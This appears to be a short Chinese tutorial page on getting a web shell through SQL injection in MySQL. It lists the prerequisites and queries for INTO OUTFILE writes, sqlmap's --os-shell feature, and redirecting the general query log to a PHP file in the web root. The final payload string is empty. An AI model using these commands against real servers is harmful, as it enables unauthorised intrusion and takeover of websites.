| sql注入getshell的几种方式 | 您所在的位置:网站首页 › cmd相对路径怎么写 › sql注入getshell的几种方式 |
|
0x01 into outfile
1.利用条件 web目录具有写权限,能够使用单引号 知道网站绝对路径(根目录,或则是根目录往下的目录都行) secure_file_priv没有具体值(在mysql/my.ini中查看)2. 怎么看secure_file_priv的值 $ show global variables like '%secure%'; $ sqlmap -u xxx --sql-shell $ select @@datadir; #查看文件路径(mysql/data的路径,根目录一般与mysql处于同一目录) $ select @@secure_file_priv; 0x02 --os-shell1.原理 --os-shell就是使用udf提权获取webshell。也是通过into outfile向服务器写入两个文件,一个可以直接执行系统命令,另一个可以上传文件。 2.利用条件 要求为数据库DBA,使用--is-dba查看当前网站连接的数据库账号是否为mysql user表中的管理员如root,是则为dba secure_file_priv没有具体值 知道网站绝对路径 0x03 写日志尝试用日志写入木马getshell不需要secure_file_priv没有具体值,但是需要知道网站根目录。 $ show global variables like '%general%' #查看日志功能是否开启 $ set global general_log = 'ON' #未开启的话设置为on $ set global general_log_file = 'C:/phpStudy1/WWW/yyj.php' $ select '' |
| CopyRight 2018-2019 实验室设备网 版权所有 |